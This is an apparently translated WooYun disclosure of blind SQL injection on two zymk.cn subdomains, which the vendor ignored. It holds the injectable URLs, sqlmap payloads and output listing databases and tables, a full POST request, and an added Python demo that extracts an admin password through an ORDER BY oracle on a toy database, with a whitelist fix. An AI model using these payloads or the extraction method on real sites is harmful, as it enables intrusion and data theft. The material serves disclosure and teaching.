
Vulnerability summary

Defect ID: wooyun-2015-0150841

Title: SQL injection on 漫客网 (zymk.cn)

Vendor: zymk.cn

Author: 路人甲

Submitted: 2015-11-02 15:15

Fix time: 2015-11-07 15:16

Published: 2015-11-07 15:16

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-11-02: details sent to the vendor, awaiting vendor response
2015-11-07: vendor actively ignored the vulnerability, details disclosed to the public

Brief description:

SQL injection on 漫客网 (zymk.cn)

Detailed description:

http://shop.zymk.cn/index.php/Tag/?id=2&order=listorder


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: order (GET)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: id=2&order=(SELECT (CASE WHEN (1825=1825) THEN 1825 ELSE 1825*(SELECT 1825 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
---
[13:31:54] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[13:31:54] [INFO] fetching database names
[13:31:54] [INFO] fetching number of databases
[13:31:54] [INFO] resumed: 2
[13:31:54] [INFO] resumed: information_schema
[13:31:54] [INFO] resumed: mkshop
available databases [2]:
[*] information_schema
[*] mkshop
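The first finding above is a boolean-based blind injection through an ORDER BY parameter: the value of `order` is evaluated by MySQL, and sqlmap's payload uses a CASE expression whose ELSE branch triggers a multi-row subquery error, so a true condition and a false condition produce different pages. The script below is an added example, not part of the original report and not the site's code. It models the same injectable pattern (the client's `order` value concatenated into ORDER BY) against a constructed in-memory SQLite database with assumed tables `goods` and `admin`, shows how a CASE expression in ORDER BY becomes a true/false oracle that reads data out of another table one character at a time, and places a whitelist-based handler beside it. Because SQLite does not raise the multi-row-subquery error that the MySQL payload relies on, the oracle here switches between two sort columns instead; the inference logic is the same.

```python
import sqlite3
import string

# Constructed sample schema; the table and column names are assumptions for this
# example and are not the real 'mkshop' schema from the report.
SETUP_SQL = """
CREATE TABLE goods (id INTEGER PRIMARY KEY, title TEXT, listorder INTEGER);
INSERT INTO goods VALUES (1, 'zeta', 30), (2, 'alpha', 20), (3, 'mid', 10);
CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO admin VALUES (1, 'root', 's3cret');
"""


def open_db():
    """Fresh in-memory database loaded with the constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.executescript(SETUP_SQL)
    return db


def vulnerable_list(db, order):
    """Injectable handler: the client-supplied 'order' value is concatenated into
    ORDER BY, so any SQL expression placed in it is evaluated by the database."""
    rows = db.execute("SELECT id FROM goods ORDER BY " + order).fetchall()
    return [r[0] for r in rows]


# Hardened handler: the client sends a token, the server maps it to a column name.
ALLOWED_ORDERS = {"id": "id", "title": "title", "listorder": "listorder"}


def hardened_list(db, order):
    """Only whitelisted tokens reach the query; everything else is rejected."""
    column = ALLOWED_ORDERS.get(order)
    if column is None:
        raise ValueError("unsupported order key")
    rows = db.execute("SELECT id FROM goods ORDER BY " + column).fetchall()
    return [r[0] for r in rows]


def is_rejected(db, order):
    """True when the hardened handler refuses the value."""
    try:
        hardened_list(db, order)
    except ValueError:
        return True
    return False


def make_oracle(db):
    """Boolean oracle built on the injectable ORDER BY: a true condition sorts the
    rows by id, a false one by title. The attacker first records the order for a
    known-true condition (1=1) and then compares every later response to it."""
    template = "(CASE WHEN ({cond}) THEN id ELSE title END)"
    reference = vulnerable_list(db, template.format(cond="1=1"))

    def ask(cond):
        return vulnerable_list(db, template.format(cond=cond)) == reference

    return ask


def extract_admin_password(db, max_len=32):
    """Recover admin.password one character at a time through the oracle.
    The alphabet is limited to lowercase letters and digits; a character outside
    it stops extraction instead of guessing."""
    ask = make_oracle(db)
    target = "(SELECT password FROM admin WHERE id=1)"
    recovered = ""
    for pos in range(1, max_len + 1):
        if not ask(f"length({target}) >= {pos}"):
            break  # reached the end of the value
        for ch in string.ascii_lowercase + string.digits:
            if ask(f"substr({target}, {pos}, 1) = '{ch}'"):
                recovered += ch
                break
        else:
            break  # character outside the alphabet
    return recovered


if __name__ == "__main__":
    db = open_db()
    print("vulnerable handler leaks:", extract_admin_password(db))
    print("hardened handler, listorder:", hardened_list(db, "listorder"))
    print("hardened handler rejects payload:",
          is_rejected(db, "(CASE WHEN (1=1) THEN id ELSE title END)"))
```

The whitelist is the right fix for ORDER BY because a column name cannot be bound as a query parameter; for the second finding below, where the `full` POST parameter lands in a WHERE clause, a parameterized query is the fix instead.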


http://baike.zymk.cn/index.php?search-fulltext-title-1--all-0-within-time-desc-1


POST /index.php?search-default HTTP/1.1
Host: baike.zymk.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://baike.zymk.cn/index.php?doc-create.html
Cookie: BAIDU_DUP_lcr=http://www.baidu.com/link?url=Zjo417Xo1rTTvkH3nz19eSONwF-7YiqRO6ytC3XN6Ma&wd=&eqid=81757fa0000926ad00000005563444e9; Hm_lvt_bfeb001eb5a0b3162d945f1b9cdcb912=1446266096; Hm_lpvt_bfeb001eb5a0b3162d945f1b9cdcb912=1446269195; FX7m_3f67_saltkey=w4hcq4U3; FX7m_3f67_lastvisit=1446263008; FX7m_3f67_sid=y769HA; FX7m_3f67_lastact=1446268181%09misc.php%09seccode; FX7m_3f67_st_p=0%7C1446268175%7C4040132a2da2b28facae50f5f3ec46ac; FX7m_3f67_visitedfid=47D299D5472; FX7m_3f67_viewid=tid_596946; FX7m_3f67_seccode=6324.ec5df85813cf7859f6; TP_think_language=%22zh-CN%22; hd_sid=NkVt0X; hd_searchtime=1446267013; CNZZDATA1789733=cnzz_eid%3D1206615900-1446266704-%26ntime%3D1446266704; FX7m_3f67_home_readfeed=1446268160; FX7m_3f67_nofocus_home=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 19

searchtext=1&full=1


Parameter: full

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: full (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: searchtext=1&full=1 AND 2105=2105
---
[13:35:35] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: PHP 5.2.17
back-end DBMS: Microsoft SQL Server 2008
[13:35:35] [INFO] fetching database names
[13:35:35] [INFO] fetching number of databases
[13:35:35] [INFO] resumed: 4411
[13:35:35] [INFO] resuming partial value: #\x13\x12\x12\n\tEE%##\x13\x12\x12\n\n\n\nER\tIEE%###\x13\x12\x12\n\n\tIF\tEE%%E%%%#\x13\x13\x12\x12\x12\x12\n\tIEEE%%#%%#####%%#%#####\x13\x13\x12\x13\x13\x13\x13\x12\x12\x12\x12\x12\n\x12\x12\x12\x13%##%EE%&\n\nIEE%##\x13\x13\x12\x13\x12\n\tIEE%##\x14\x13\x12\x12\n\tIEE%%##\x13\x13\x12\x12\n\n\tIIEE%##\x13\x12\x12\n\tE%%####\x13\x12\n\tIIEEE%#\x13\x12\x12\n\tEEE%##\x12\x12\x13\x13%IIEEEEE%%IM%E%#%#\x13\x13\x12\x12\x12\n\n\tIIK\x13\x12\x12\x12###\x13\x13#\x13\x13\x13\x12\x12\x12\tJ\tJ\x13*\n\n\tIIEEEIIEE%#\x13\x12\x12\n\tIIIE%E%#c#\x13E%##\x13\x12\x12\x12\n\n\tIE%%%%###\x13\x12\x12\x12\n\n\tIEE##\x13\x13\x13\x13\x12\x12\x12\n\tIEE%#%"\x13\x13\x12\n\tR\tEE#
[13:35:35] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:35:35] [INFO] retrieved:


Proof of vulnerability:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: order (GET)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: id=2&order=(SELECT (CASE WHEN (1825=1825) THEN 1825 ELSE 1825*(SELECT 1825 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
---
[13:36:16] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[13:36:16] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[13:36:16] [INFO] fetching tables for database: 'mkshop'
[13:36:16] [INFO] fetching number of tables for database 'mkshop'
[13:36:16] [INFO] resumed: 189
[13:36:16] [INFO] resuming partial value: activi
[13:36:16] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:36:16] [INFO] retrieved: ty_nu


It runs slowly, so I did not dig any deeper.

Fix recommendation:

Copyright notice: please credit 路人甲@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2015-11-07 15:16

Vendor reply:

Vulnerability Rank: 4 (WooYun assessment)

Latest status:

None